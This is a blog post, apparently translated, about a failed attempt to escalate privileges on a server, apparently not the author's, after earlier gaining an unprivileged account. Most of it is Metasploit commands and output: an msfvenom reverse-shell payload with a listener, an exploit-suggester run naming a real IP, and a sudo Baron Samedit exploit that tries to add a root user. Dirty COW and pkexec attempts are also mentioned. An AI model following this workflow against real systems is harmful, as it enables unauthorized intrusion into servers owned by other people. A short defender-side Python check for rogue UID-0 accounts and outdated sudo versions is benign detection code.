A Failed Privilege Escalation

Preface

Continuing from the previous post, 顶级黑客:验证码发一下 ("Top Hacker: Send Me the Captcha"), which ended with an unprivileged user account, I decided to try escalating privileges.

To say it up front: we will not do anything destructive, and we will not take a second look at anything we should not touch.

Main Text

First, generate an ELF payload with msf and get a session back.

msfvenom -p Linux/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f elf -o name.elf

Start a listener in msfconsole; the session comes back successfully.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost x.x.x.x
lhost => x.x.x.x
msf6 exploit(multi/handler) > set lport xxxx
lport => xxxx
msf6 exploit(multi/handler) > exploit

[-] Handler failed to bind to x.x.x.x:xxxx:- -
[*] Started reverse TCP handler on 0.0.0.0:xxxx
[*] Sending stage (3045348 bytes) to x.x.x.x
[*] Meterpreter session 1 opened (x.x.x.x:xxxx -> x.x.x.x:xxxx) at 2023-02-15 00:34:00 +0800

Next, use the Local Exploit Suggester module to search for potential privilege-escalation paths.

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester

msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

After it ran, it reported the following 4 possible candidates.

[*] 206.238.123.163 - Valid modules for session 1:
============================

# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.
2 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
3 exploit/linux/local/su_login Yes The target appears to be vulnerable.
4 exploit/linux/local/sudo_baron_samedit Yes The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.

Next, I tried the fourth one, exploit/linux/local/sudo_baron_samedit, because its description seemed more reliable to me than the others.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/sudo_baro
msf6 exploit(linux/local/sudo_baron_samedit) > set session 1
session => 1
msf6 exploit(linux/local/sudo_baron_samedit) > set lport xxxx
lport => xxxx
msf6 exploit(linux/local/sudo_baron_samedit) > exploit
[*] Started reverse TCP handler on x.x.x.x:xxxx
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[*] Using automatically selected target: CentOS 7 x64 (sudo v1.8.23, libc v2.17)
[*] Writing '/tmp/GpZwKB.py' (6207 bytes) ...
[*] A successful exploit will create a new root user msf with password bhkzjcvtbcurriq
[*] Brute forcing ASLR (can take several minutes)...

What followed was a long wait, which unfortunately ended in failure. I then tried Dirty COW and pkexec as well; neither worked.
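As a defender-side addition (not code from the original post), two checks that follow from what the module printed: flag any UID-0 account other than root, since a successful run would add the root user msf it announces, and parse a sudo version banner so it can be compared against the fixed version from the vendor's advisory. The passwd sample is constructed, and the fixed version is left for the reader to supply.

```python
import re
from typing import List, Tuple

# Constructed sample /etc/passwd that already carries the side effect the
# module announces ("create a new root user msf").
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
msf:x:0:0::/root:/bin/bash
"""


def extra_uid0_accounts(passwd_text: str) -> List[str]:
    """Return every account with UID 0 other than root.

    A successful sudo_baron_samedit run adds one, so any name returned
    here after an incident is a strong indicator of compromise.
    """
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if line.startswith("#") or len(fields) < 7:
            continue
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            found.append(name)
    return found


def parse_sudo_version(banner: str) -> Tuple[int, int, int, int]:
    """Parse 'Sudo version 1.8.23' or '1.9.5p2' into a comparable tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", banner)
    if not m:
        raise ValueError(f"no sudo version found in {banner!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def sudo_below(banner: str, fixed_version: str) -> bool:
    """True when the upstream version in banner is older than fixed_version.

    fixed_version is not hard-coded: take it from the vendor advisory.
    Caveat: RHEL/CentOS backport fixes without bumping the upstream number,
    so a '1.8.23' banner may already be patched. Confirm with the package
    release (rpm -q sudo) rather than trusting this comparison alone.
    """
    return parse_sudo_version(banner) < parse_sudo_version(fixed_version)
```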

One small hiccup along the way: since I was working from a reverse shell and had spawned an interactive shell with python, I hit the following error.

gcc: error trying to exec 'cc1': execvp: No such file or directory

After some searching, I found a workaround.

export PATH=$PATH

Closing

It is frustrating not to have gotten root, but better to stop here than to break someone's server.